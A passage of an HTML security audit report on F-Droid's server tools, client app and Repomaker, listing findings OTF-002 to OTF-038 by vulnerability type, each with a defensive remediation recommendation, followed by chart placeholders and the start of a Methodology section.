Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver" style="color: #e2632a;">OTF-002</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing" style="color: #e2632a;">OTF-003</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">yaml.safe_load</span> instead.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py" style="color: #e2632a;">OTF-004</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Infoleak</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  Recommendation: restrict URLs to HTTP(S) schemes.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data" style="color: #e2632a;">OTF-005</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Create a simple interpreter for the allowed rules, or do strict validation of the input.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py" style="color: #e2632a;">OTF-006</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py" style="color: #e2632a;">OTF-007</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Recommendation: validate the URL and disallow schemas like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span>, possibly using a whitelist.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response" style="color: #e2632a;">OTF-008</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>html/JavaScript Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>User supplied URI should be parsed and components validated before including it in the response.
Alternatively, URLEncode or httpencode the URI.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage" style="color: #e2632a;">OTF-009</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified trust</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Use a mechanism similar to asking for pin before pairing two devices through BlueTooth, for mobile based repos.
For non-mobile based repos, the TOFU key should not be stored permanently.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites" style="color: #e2632a;">OTF-010</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application should validate the message being shown to the user and its origin. Also accepting any message or domain from a user and redirecting the user to a different domain is a very insecure implementation. The users should not be redirected to any domain given by the other user. A validation of this parameter is also needed to be implemented.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py" style="color: #e2632a;">OTF-011</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  Deploy bleach against the descriptions.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver" style="color: #e2632a;">OTF-012</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Either use longer ids, or don't make the ids depending on user input.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py" style="color: #e2632a;">OTF-013</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Check for size of images before processing, set ulimit and disk quota.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py" style="color: #e2632a;">OTF-014</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Generate export files in a dedicated folder with restrictive access permissions.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver" style="color: #e2632a;">OTF-015</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Replace these with its defusedxml equivalent function or - only applicable to xml.* modules - make sure defusedxml.defuse_stdlib() is called.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified" style="color: #e2632a;">OTF-016</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file download</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Only allow certain types of files to be transmitted (whitelisting) if possible.
    Limit the size of file to be transmitted, and warn the user for large files.
    The issue should be fixed in the parent class, and the subclasses should perform some content type check, to avoid malicious file/app installation on the victim device.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection" style="color: #e2632a;">OTF-017</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.

</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection" style="color: #e2632a;">OTF-018</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.

</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f35-potential-sql-injection" style="color: #e2632a;">OTF-019</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Use prepared statements for DB query preparation.
    Validate the strings with white listing before using in SQL query.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard" style="color: #e2632a;">OTF-020</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>URI redirect</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    If this feature is not needed, it should be removed.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f43-file-deleted-unconditionally" style="color: #e2632a;">OTF-021</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>File deletion</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    On finding that the output file exists, the function should return error and let higher level code handle the error. Alternatively, the code should add a random suffix to the output file name if the specified file exists.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended" style="color: #e2632a;">OTF-022</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure temp file</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    FILE class in Java allows creation of subdirs, and setting specific permissions on created files. It is recommended to create the temp files within app specific subdirectory, for example "Fdroid" under global tmp folder. This subfolder can be created with restricted permissions for owner only, to create other temporary files with restricted permissions within this app-specific folder.

</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-023</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions" style="color: #e2632a;">OTF-024</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to never use the unvalidated user input inside a SQL query and execute it. The best way to make sure adversaries will not be able to inject unsolicited SQL syntax into your queries is to avoid using SQLiteDatabase.rawQuery() instead opting for a parameterized statement.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-" style="color: #e2632a;">OTF-025</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The way the feature has been implemented is prone to different attacks. It is suggested to not directly open a web server and allow everyone to access. Some authentication should be applied.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl" style="color: #e2632a;">OTF-026</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Transport Layer Security</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
A better security practice is to include an SSL certificate inside the application build.
Then check and trust only that certificate at runtime. This is known as SSL pinning.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-027</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated. SHA256 is a better algorithm to use
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker" style="color: #e2632a;">OTF-028</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Tabnabbing</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">rel="noopener"</span> when using <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">target="_blank"</span>
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches" style="color: #e2632a;">OTF-029</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious File Upload</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  Check if the mime type matches the extension.
  Use a white-list instead of a blacklist of extensions.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input" style="color: #e2632a;">OTF-030</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  clean the name and data_list contents before rendering.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py" style="color: #e2632a;">OTF-031</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Dangerous Function</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Avoid the usage of the python pickle module</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path" style="color: #e2632a;">OTF-032</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Execution without path</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Establish a list of all good paths once (during installation), store it in a file with secure permissions and use this to call the external programs.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py" style="color: #e2632a;">OTF-033</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check" style="color: #e2632a;">OTF-034</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file in response</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Only allow certain types of files to be transmitted (whitelisting) if possible.
     Limit the size of file to be transmitted, and warn the user for large files.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys" style="color: #e2632a;">OTF-035</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Hardcoded keys</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Provide key revocation list check. Alternatively, list the root CA keys in a separate file which can be updated independently.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding" style="color: #e2632a;">OTF-036</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak data protection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    If the data being protected is sensitive, stronger encryption methods should be used.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f38-untrusted-external-links" style="color: #e2632a;">OTF-037</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified remote resources</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Documented manual review of external links before accepting a MR/PR/update/patch should be in place, and warning should be displayed to user when they click on the external links.

</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended" style="color: #e2632a;">OTF-038</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak regular expression</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Regular expression pattern should be strengthened to not allow special characters such as semi colon, pipe, quotes etc. to avoid OS command injection attacks.

</div></td></tr></tbody></table></div>

      </div>
      <a name="dataSummary"></a><div style="margin-bottom: 1.3cm;">
                        <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Charts</div></td></tr></table></div>
                        <a name="threatlevelpie"></a><div style="margin-bottom: 1.3cm;">
                                <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8.1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Findings by Threat Level</div></td></tr></table></div>
                                <div style="margin-bottom: 5pt; line-height: 6mm;"><table style="margin-top: 15px;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>See pdf version.</div></td></tr></tbody></table>
                        </div>
                        <a name="typepie"></a><div style="margin-bottom: 1.3cm;">
                                <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8.2</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Findings by Type</div></td></tr></table></div>
                                <div style="margin-bottom: 5pt; line-height: 6mm;"><table style="margin-top: 15px;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>See pdf version.</div></td></tr></tbody></table></div></td></tr></tbody></table></div>
                        </div>


                </div>
   </div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Executive Summary &nbsp;&nbsp;&nbsp; <span><span>&#8226;</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="methodology"></a><div style="margin-bottom: 1.3cm;">
    <div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Methodology</div></td></tr></table></div>
